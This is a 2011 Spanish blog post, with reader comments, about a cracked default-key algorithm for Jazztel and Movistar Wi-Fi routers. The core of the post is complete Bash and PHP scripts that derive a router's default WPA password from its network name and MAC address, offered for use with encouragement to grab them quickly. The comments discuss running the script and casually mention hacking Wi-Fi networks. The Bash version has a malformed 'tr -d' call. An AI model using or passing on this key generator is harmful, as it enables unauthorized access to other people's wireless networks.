miércoles, 9 de febrero de 2011

Routers WIFI al descubierto

Los usuarios de jazztel y movistar que no hayan cambiado el nombre (ESSID) de sus wifis pueden ir pensando en hacerlo: El algoritmo ha sido descifrado. Por lo visto, el que sacó a la luz el algoritmo fue elvecinoo en este hilo de lampiweb En http://kz.ath.cx/wlan/ (entre otros mas que alojan los algoritmos) se ingresa nombre y la MAC del router y te la clava.

Algunos ejemplos:

En BASH:

#!/bin/bash                                                                     

echo CalcWLAN by a.s.r                                                          

if [ $# -ne 2 ]
then
        echo "Usage: $0 <ESSID> <BSSID>"
        echo
        echo "Example: $0 WLAN_C58D 64:68:0C:C5:C5:90"
        exit 1
fi                                                                              

HEAD=$(echo -n "$1" | tr 'a-z' 'A-Z' | cut -d_ -f2)
BSSID=$(echo -n "$2" | tr 'a-z' 'A-Z' | tr -d)
BSSIDP=$(echo -n "$BSSID" | cut -c-8)
KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)                  

echo "La puta clave es $KEY"


En PHP:

// THIS CODE IS UNDER THE PUBLIC DOMAIN

function right($string, $chars)
{
	return substr($string, strlen($string) - $chars, $chars);
}

if (isset($_POST['essid']) && isset($_POST['bssid']))
{
	$bssid = preg_replace('/:/', '', strtoupper(trim($_POST['bssid'])));

	if (strlen($bssid) != 12)
	{
		die('Mete bien la MAC, buen hombre.');
	}

	$essid = strtoupper(trim($_POST['essid']));
	$_ssid = substr($bssid, 0, 8).right($essid, 4);

	die(substr(md5('bcgbghgg'.$_ssid.$bssid), 0, 20));
}


Daos prisa antes de que cierren las webs donde se alojan los fuentes.

Publicado por en
Etiquetas: , , , , , , , , ,

4 comentarios:

  1. Arthusu13 de febrero de 2011, 17:24

    Hola bueno lo que hice fue guardarlo en el escritorio con extension .sh pero me gustaria saber como lo ejecuto inente con la terinal de gnome-terminal y no pude, espero tu respuesta un saludo y gracias

    ResponderEliminar
  2. sramekim13 de febrero de 2011, 18:57

    Arturo, creo que ya te comente una vez que no tengo ni deseo WIFI, por su mala implementación, seguridad y miles de razones mas. De todas formas mejor vas a la pagina original y lo descargas de alli, que el mio esta modificado para mostrarlo correctamente en el blog. Segundo, te recomiendo que leas el siguiente articulo, de una web que leo con frecuencia, por no decir que todos los dias...

    http://www.securitybydefault.com/2011/02/wifi-auditor-mostrando-la-inseguridad.html

    y este otro

    http://www.flu-project.com/flu-projectfasttrackmetasploit-meterpreter-infection-method.html

    Suerte y no hackeeeees mucho...un saludo.

    ResponderEliminar
  3. Arthusu14 de febrero de 2011, 2:42

    Jaaajajjaja antews de ver este articulo ya sabia hackear una red wifi solo que este meodo es bueno por que es automatizado y muy bueno, ya se que la red wifi es la mas insegura yo uso el usb inalambrico xD, saludos y gracias

    ResponderEliminar
  4. Arthusu31 de marzo de 2011, 7:00

    jajajaja ya se como ejecutarlo ando aprendiendo programacion en bash shell :p
    para ejecutarlo:
    ./nombredelarchivo.sh

    lo interpreta como un ejecutable pero primero tienes que darle permisos

    chmod 777 nombredelarchivo.sh

    Y todo listo!!

    ResponderEliminar

Suscribirse a: Enviar comentarios (Atom)